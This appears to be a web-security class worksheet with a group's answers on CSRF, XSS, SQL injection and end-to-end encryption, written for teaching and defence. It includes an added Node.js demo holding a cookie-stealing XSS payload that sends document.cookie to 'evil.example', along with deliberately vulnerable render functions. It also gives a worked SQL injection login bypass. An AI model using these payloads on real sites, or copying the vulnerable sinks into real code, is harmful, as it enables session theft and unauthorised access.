- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? And what is the attacker's intention in using it?
- Consider the SQL command below. Where is the vulnerability? Think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does end-to-end encryption mean? Share an example of a well-known app using E2EE. How is that app using it?
Room 5
Nada - Mardin - Ibrahim - Shvan - Zainab Al-Najjar
A CSRF (Cross-Site Request Forgery) attack tricks a user's browser into sending an HTTP request the user never intended to a site where they are already logged in. It is usually accomplished by luring the user to click a malicious link or visit an attacker-controlled page that contains a hidden form, image or script pointing at the target site. The attack exploits the fact that browsers automatically attach the stored session cookies for that site to every request sent to it, so the server treats the forged request as a legitimate action by the user (changing an email address, transferring money). It is called a "one-click attack" because a single click on the attacker's page is enough to trigger the request; the attacker never needs to see the user's cookie.
Cross-site scripting (XSS) is an attack in which an attacker injects malicious script into pages served by a trusted website, so that the script runs in the victims' browsers under that site's origin.
The connection to cookies and sessions: because the injected script runs in the trusted site's origin, it can read document.cookie (unless the session cookie is marked HttpOnly) and send the session identifier to the attacker, who then hijacks the user's session. It can also perform actions as the user or alter the page the user sees.
The two main types: non-persistent (reflected), where the payload arrives in the current request (typically a crafted link) and is echoed straight back into the response, and persistent (stored), where the payload is saved on the server and served to everyone who later views that content. DOM-based XSS is often listed as a third category.
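The following is an added example, not part of the worksheet or the group's answer. It shows a reflected sink (a search term echoed into the page) and a stored sink (a comment board) in a hand-rolled Node.js renderer, the cookie-stealing payload that hits both, and the two defences: HTML-escaping output and marking the session cookie HttpOnly. The exfiltration URL, the comment store and the check that stands in for a browser are all constructed for the demo.

```javascript
// Added example (not from the original worksheet): reflected vs stored XSS
// sinks, a cookie-stealing payload, and the escaping that neutralises it.

// Minimal HTML escaping for text placed between tags or in quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Payload: runs in the victim's browser under the vulnerable site's origin,
// so document.cookie is that site's cookie jar. Exfiltration URL is hypothetical.
const PAYLOAD = `<img src=x onerror="fetch('https://evil.example/?c='+document.cookie)">`;

// Reflected (non-persistent): the search term from the request is echoed into
// the page. The victim has to be lured to a crafted link carrying the payload.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Stored (persistent): the payload is saved server-side once and served to
// every visitor afterwards, no link-luring needed.
const comments = []; // constructed in-memory store
function postComment(text) {
  comments.push(text);
}
function renderCommentsVulnerable() {
  return comments.map((c) => `<li>${c}</li>`).join('');
}
function renderCommentsSafe() {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('');
}

// Defence in depth: an HttpOnly session cookie is invisible to document.cookie,
// so even a script that does run cannot read the session identifier.
function sessionCookieHeader(sid) {
  return `sid=${sid}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Crude stand-in for a browser's parser: is there a live <img onerror=...>
// element in the output, or only escaped text?
function containsActiveTag(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}
```

Escaping must match the context the data lands in (HTML body, attribute, URL, JavaScript); the function above covers the first two, which is where both sinks in this example write.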
SQL injection is a code injection technique that exploits an application that builds SQL statements by concatenating untrusted input, allowing the attacker to run SQL of their own choosing against the database. The attacker's intention is typically to bypass authentication, read data they are not authorized to see (for example dumping whole tables), or modify or delete data.
Where the vulnerability is and how an attacker can misuse it:
The vulnerability is the template string: username and password come straight from req.body and are interpolated into the SQL text, so whatever the user types becomes part of the statement. Two further problems are visible in the same line: the interpolated values are not even quoted, and the query compares the password column directly, which means passwords are stored in plaintext.
SQL Injection: An attacker can supply input containing SQL syntax to change the meaning of the WHERE clause. Because the values are unquoted, the attacker supplies the quotes themselves: username 'alice' and password '' OR 1=1 -- turn the query into SELECT Count(*) FROM Users WHERE username='alice' AND password='' OR 1=1 --, which matches every row, so Count(*) is non-zero and the login check passes without a valid password. (The commonly quoted payload ' OR 1=1 -- would leave an unterminated string here, because there is no opening quote in the template.) If the driver allows multiple statements, the same input point can be used to append further statements that read or alter other tables.
Brute Force Attack: Independently of injection, the endpoint permits credential guessing: an attacker can submit many username/password combinations until one returns Count(*) > 0. This is particularly dangerous if the application has no rate limiting or lockout after repeated failures, and the plaintext comparison means any leak of the Users table is a full credential leak.
End-to-end encryption means a message is encrypted on the sender's device and only decrypted on the recipient's device, so nobody in between (the network, the service's own servers) can read it. WhatsApp is a popular app using this: it implements the Signal protocol, so when you send a message it is encrypted with keys that exist only on your phone and the receiver's phone, keeping it unreadable to attackers on the network and to WhatsApp itself, which only relays the ciphertext.